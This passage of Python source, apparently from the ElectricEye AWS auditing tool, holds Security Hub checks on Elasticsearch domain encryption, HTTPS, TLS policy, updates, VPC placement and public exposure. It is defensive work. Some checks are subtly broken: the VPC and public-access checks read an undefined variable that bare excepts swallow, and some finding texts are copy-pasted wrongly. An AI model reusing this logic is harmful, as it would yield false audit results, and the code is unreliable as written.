"EncryptionAtRestOptions": {"Enabled": False},
}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-encryption-at-rest-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Elasticsearch.3] Elasticsearch Service domains should be encrypted at rest",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " is encrypted at rest",
"Remediation": {
"Recommendation": {
"Text": "You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 5.1 or later.",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/encryption-at-rest.html#enabling-ear",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
"EncryptionAtRestOptions": {"Enabled": True},
}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("es")
def node2node_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Elasticsearch.4] Elasticsearch Service domains should use node-to-node encryption"""
response = list_domain_names(cache)
myDomainNames = response["DomainNames"]
for domains in myDomainNames:
esDomainName = str(domains["DomainName"])
response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
domainId = str(response["DomainStatus"]["DomainId"])
domainArn = str(response["DomainStatus"]["ARN"])
node2nodeEncryptionCheck = str(
response["DomainStatus"]["NodeToNodeEncryptionOptions"]["Enabled"]
)
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if node2nodeEncryptionCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-node2node-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[Elasticsearch.4] Elasticsearch Service domains should use node-to-node encryption",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " does not use node-to-node encryption. You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 6.0 or later",
"Remediation": {
"Recommendation": {
"Text": "You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 6.0 or later.",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/ntn.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
"NodeToNodeEncryptionOptions": {"Enabled": False},
}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-node2node-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Elasticsearch.4] Elasticsearch Service domains should use node-to-node encryption",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " uses node-to-node encryption.",
"Remediation": {
"Recommendation": {
"Text": "You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 6.0 or later.",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/ntn.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
"NodeToNodeEncryptionOptions": {"Enabled": True},
}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("es")
def https_enforcement_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Elasticsearch.5] Elasticsearch Service domains should enforce HTTPS-only communications"""
response = list_domain_names(cache)
myDomainNames = response["DomainNames"]
for domains in myDomainNames:
esDomainName = str(domains["DomainName"])
response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
domainId = str(response["DomainStatus"]["DomainId"])
domainArn = str(response["DomainStatus"]["ARN"])
httpsEnforcementCheck = str(
response["DomainStatus"]["DomainEndpointOptions"]["EnforceHTTPS"]
)
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if httpsEnforcementCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-enforce-https-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[Elasticsearch.5] Elasticsearch Service domains should enforce HTTPS-only communications",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " does not enforce HTTPS-only communications. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your domain should enforce HTTPS-only communications refer to the About Configuration Changes section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-configuration-changes",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
"DomainEndpointOptions": {"EnforceHTTPS": False},
}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-enforce-https-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Elasticsearch.5] Elasticsearch Service domains should enforce HTTPS-only communications",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " enforces HTTPS-only communications. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your domain should enforce HTTPS-only communications refer to the About Configuration Changes section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-configuration-changes",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
"DomainEndpointOptions": {"EnforceHTTPS": True},
}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("es")
def tls_policy_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Elasticsearch.6] Elasticsearch Service domains that enforce HTTPS-only communications should use a TLS 1.2 security policy"""
response = list_domain_names(cache)
myDomainNames = response["DomainNames"]
for domains in myDomainNames:
esDomainName = str(domains["DomainName"])
response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
domainId = str(response["DomainStatus"]["DomainId"])
domainArn = str(response["DomainStatus"]["ARN"])
httpsEnforcementCheck = str(
response["DomainStatus"]["DomainEndpointOptions"]["EnforceHTTPS"]
)
if httpsEnforcementCheck == "True":
# ISO Time
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
tlsPolicyCheck = str(
response["DomainStatus"]["DomainEndpointOptions"]["TLSSecurityPolicy"]
)
if tlsPolicyCheck != "Policy-Min-TLS-1-2-2019-07":
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-tls-1-2-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[Elasticsearch.6] Elasticsearch Service domains that enforce HTTPS-only communications should use a TLS 1.2 security policy",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " does not use a TLS 1.2 security policy. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your domain should use a TLS 1.2 security policy refer to the About Configuration Changes section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-configuration-changes",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
"DomainEndpointOptions": {
"EnforceHTTPS": True,
"TLSSecurityPolicy": tlsPolicyCheck,
},
}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-tls-1-2-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Elasticsearch.6] Elasticsearch Service domains that enforce HTTPS-only communications should use a TLS 1.2 security policy",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " uses a TLS 1.2 security policy.",
"Remediation": {
"Recommendation": {
"Text": "If your domain should use a TLS 1.2 security policy refer to the About Configuration Changes section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-configuration-changes",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
"DomainEndpointOptions": {
"EnforceHTTPS": True,
"TLSSecurityPolicy": tlsPolicyCheck,
},
}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
pass
@registry.register_check("es")
def elastic_update_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Elasticsearch.7] Elasticsearch Service domains should be updated to the latest service software version"""
response = list_domain_names(cache)
myDomainNames = response["DomainNames"]
for domains in myDomainNames:
esDomainName = str(domains["DomainName"])
response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
domainId = str(response["DomainStatus"]["DomainId"])
domainArn = str(response["DomainStatus"]["ARN"])
updateCheck = str(response["DomainStatus"]["ServiceSoftwareOptions"]["UpdateAvailable"])
updateInformation = str(response["DomainStatus"]["ServiceSoftwareOptions"]["Description"])
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if updateCheck == "True":
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-version-update-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "LOW"},
"Confidence": 99,
"Title": "[Elasticsearch.7] Elasticsearch Service domains should be updated to the latest service software version",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " is not up to date. Service provided message follows: "
+ updateInformation
+ ". Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "For update information refer to the Service Software Updates section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-service-software",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.MA-1",
"NIST SP 800-53 MA-2",
"NIST SP 800-53 MA-3",
"NIST SP 800-53 MA-5",
"NIST SP 800-53 MA-6",
"AICPA TSC CC8.1",
"ISO 27001:2013 A.11.1.2",
"ISO 27001:2013 A.11.2.4",
"ISO 27001:2013 A.11.2.5",
"ISO 27001:2013 A.11.2.6",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-version-update-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Elasticsearch.7] Elasticsearch Service domains should be updated to the latest service software version",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " is up to date. Service provided message follows: "
+ updateInformation,
"Remediation": {
"Recommendation": {
"Text": "For update information refer to the Service Software Updates section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-service-software",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.MA-1",
"NIST SP 800-53 MA-2",
"NIST SP 800-53 MA-3",
"NIST SP 800-53 MA-5",
"NIST SP 800-53 MA-6",
"AICPA TSC CC8.1",
"ISO 27001:2013 A.11.1.2",
"ISO 27001:2013 A.11.2.4",
"ISO 27001:2013 A.11.2.5",
"ISO 27001:2013 A.11.2.6",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("es")
def elasticsearch_in_vpc_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Elasticsearch.8] Elasticsearch Service domains should be in a VPC"""
response = list_domain_names(cache)
myDomainNames = response["DomainNames"]
for domains in myDomainNames:
esDomainName = str(domains["DomainName"])
response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
domainId = str(response["DomainStatus"]["DomainId"])
domainArn = str(response["DomainStatus"]["ARN"])
try:
vpcId = str(info["VPCOptions"]["VPCId"])
except:
vpcId = "NO_VPC"
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# This is a failing check
if vpcId == "NO_VPC":
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-in-vpc-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure"
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[Elasticsearch.8] Elasticsearch Service domains should be in a VPC",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " is not in a VPC, Placing an Amazon ES domain within a VPC enables secure communication between Amazon ES and other services within the VPC without the need for an internet gateway, NAT device, or VPN connection. All traffic remains securely within the AWS Cloud. Because of their logical isolation, domains that reside within a VPC have an extra layer of security when compared to domains that use public endpoints. Refer to the remediation instructions if this configuration is not intended.",
"Remediation": {
"Recommendation": {
"Text": "For information on placing Domains in a VPC refer to the Launching your Amazon Elasticsearch Service domains using a VPC section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion
}
}
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
]
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE"
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-in-vpc-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure"
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Elasticsearch.8] Elasticsearch Service domains should be in a VPC",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " is in a VPC.",
"Remediation": {
"Recommendation": {
"Text": "For information on placing Domains in a VPC refer to the Launching your Amazon Elasticsearch Service domains using a VPC section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion
}
}
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
]
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED"
}
yield finding
@registry.register_check("es")
def elasticsearch_public_access_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Elasticsearch.9] Elasticsearch Service domains should not be exposed to the public"""
response = list_domain_names(cache)
myDomainNames = response["DomainNames"]
for domains in myDomainNames:
esDomainName = str(domains["DomainName"])
response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
domainId = str(response["DomainStatus"]["DomainId"])
domainArn = str(response["DomainStatus"]["ARN"])
# Determine if ES has Cognito Enabled
try:
cognitoEnabledCheck = str(response["DomainStatus"]["CognitoOptions"]["Enabled"])
except:
cognitoEnabledCheck = "False"
# Determine if ES is in a VPC
try:
vpcId = str(info["VPCOptions"]["VPCId"])
except:
vpcId = "NO_VPC"
# Determine if there is a policy and then parse through it. If the "AWS": "*" principal is allowed (anonymous access) without
# any conditions we can assume there is not anything else to stop them
try:
policyDoc = info["AccessPolicies"]
policyJson = json.loads(policyDoc.encode().decode("unicode_escape"))
hasPolicy = "True"
for sid in policyJson["Statement"]:
try:
conditionCheck = str(sid["Condition"])
hasCondition = "True"
except:
conditionCheck = ""
hasCondition = "False"
if str(sid["Principal"]) == '{"AWS": "*"}' and hasCondition == "False":
policyAllowAnon = "True"
else:
policyAllowAnon = "False"
except:
policyDoc = ""
policyJson = "NO_POLICY"
policyAllowAnon = "NO_POLICY"
hasPolicy = "False"
# Full Public Check
if policyAllowAnon == "True" and vpcId == "NO_VPC" and cognitoEnabledCheck == "False":
fullPublic = "True"
else:
fullPublic = "False"
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# This is a failing check
if fullPublic == "True":
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-public-access-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure"
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "CRITICAL"},
"Confidence": 99,
"Title": "[Elasticsearch.9] Elasticsearch Service domains should not be exposed to the public",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " is open to public due to not using a VPC, Cognito, or any additional conditions within the resource policy. Public access will allow malicious actors to attack the confidentiality, integrity or availability of documents indexed in your Domain. Refer to the remediation instructions if this configuration is not intended.",
"Remediation": {
"Recommendation": {
"Text": "For information on protecting Domains with a Resource-based Policy refer to the Identity and Access Management in Amazon Elasticsearch Service section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-ac.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion
}
}
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
]
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE"
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-public-access-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure"
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "CRITICAL"},
"Confidence": 99,
